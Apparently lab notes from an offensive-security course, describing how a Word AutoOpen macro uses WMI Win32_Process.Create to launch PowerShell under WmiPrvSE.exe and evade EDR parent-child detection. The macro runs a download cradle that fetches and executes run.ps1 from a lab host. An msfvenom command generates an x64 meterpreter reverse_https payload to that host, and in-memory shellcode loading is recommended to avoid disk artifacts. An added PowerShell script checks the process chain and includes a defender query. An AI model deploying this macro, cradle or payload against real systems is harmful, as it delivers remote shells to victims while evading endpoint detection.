Dechaining with WMI

Our goal is to use WMI from VBA to create the PowerShell process, so that it runs as a child of the WMI provider host instead of as a child of Microsoft Word. A powershell.exe child of WINWORD.EXE is a parent-child chain that endpoint detection commonly alerts on; creating the process through the Win32_Process.Create method breaks that chain.

Sub MyMacro()
    ' Download cradle: the host/path are the lab values used throughout these notes
    strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.220.128/run.ps1'))"
    ' Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId)
    ' The process is created by WMI, so its parent is WmiPrvSE.exe rather than WINWORD.EXE.
    ' pid receives the new process ID (output parameter).
    GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub
Sub AutoOpen()
    MyMacro
End Sub

When the macro is executed, a new PowerShell prompt opens, and PowerShell runs as a child process of WmiPrvSE.exe rather than of Microsoft Word. Because WmiPrvSE.exe is a 64-bit process on 64-bit Windows, the powershell.exe it launches is the 64-bit one from System32, even when Office itself is 32-bit.
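The two claims above (parent is WmiPrvSE.exe, process is 64-bit) are worth checking before committing to a payload. The script below is an added example, not part of the original notes: run it inside the PowerShell that the macro spawned. It walks the parent chain through Win32_Process (the same class the macro used), reports the bitness, and, as the defender's view of the same trick, lists every powershell.exe parented by WmiPrvSE.exe. The function names are my own.

```powershell
# Added example, not from the original notes. Run inside the PowerShell the macro
# spawned. Get-ParentChain walks ParentProcessId upwards; Find-WmiSpawnedPowerShell
# is the detection-side query a defender would run against the same technique.

function Get-ParentChain {
    param([int]$ProcessId = $PID)

    $chain = @()
    $current = Get-CimInstance Win32_Process -Filter "ProcessId = $ProcessId"
    while ($current) {
        $chain += [pscustomobject]@{
            Name = $current.Name
            Pid  = $current.ProcessId
            PPid = $current.ParentProcessId
            Path = $current.ExecutablePath
        }
        $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($current.ParentProcessId)"
        # Stop at the root, or when the parent PID has been reused by a process
        # younger than its "child": that is a stale ParentProcessId, not a parent.
        if (-not $parent -or $parent.CreationDate -gt $current.CreationDate) { break }
        $current = $parent
    }
    return $chain
}

function Find-WmiSpawnedPowerShell {
    # Dechaining removes the WINWORD.EXE -> powershell.exe signal, but the
    # WmiPrvSE.exe -> powershell.exe relationship is itself a visible signal.
    $providerHosts = Get-CimInstance Win32_Process -Filter "Name = 'WmiPrvSE.exe'"
    foreach ($h in $providerHosts) {
        Get-CimInstance Win32_Process -Filter "ParentProcessId = $($h.ProcessId) AND Name = 'powershell.exe'" |
            Select-Object ProcessId, ParentProcessId, CommandLine
    }
}

$chain = Get-ParentChain -ProcessId $PID
$chain | Format-Table -AutoSize

$bits = if ([Environment]::Is64BitProcess) { 64 } else { 32 }
$parentName = if ($chain.Count -gt 1) { $chain[1].Name } else { 'unknown' }
"This PowerShell (PID $PID) is $bits-bit; its parent is $parentName"
if ($chain.Name -contains 'WINWORD.EXE') {
    'WARNING: WINWORD.EXE is still in the parent chain; the process was not dechained.'
}

'powershell.exe processes parented by WmiPrvSE.exe:'
Find-WmiSpawnedPowerShell | Format-Table -AutoSize
```

Expect the chain to read powershell.exe -> WmiPrvSE.exe -> svchost.exe and the bitness line to say 64-bit; if it says 32-bit, the x64 msfvenom payload below will not run in that process.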

Keep in mind that the shellcode runner must therefore also be 64-bit, so generate x64 shellcode for it:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f ps1

For run.ps1, use the in-memory PowerShell shellcode runner, specifically the reflection-based variant that resolves the Win32 API at runtime instead of compiling a C# assembly with Add-Type (which writes a temporary DLL to disk).
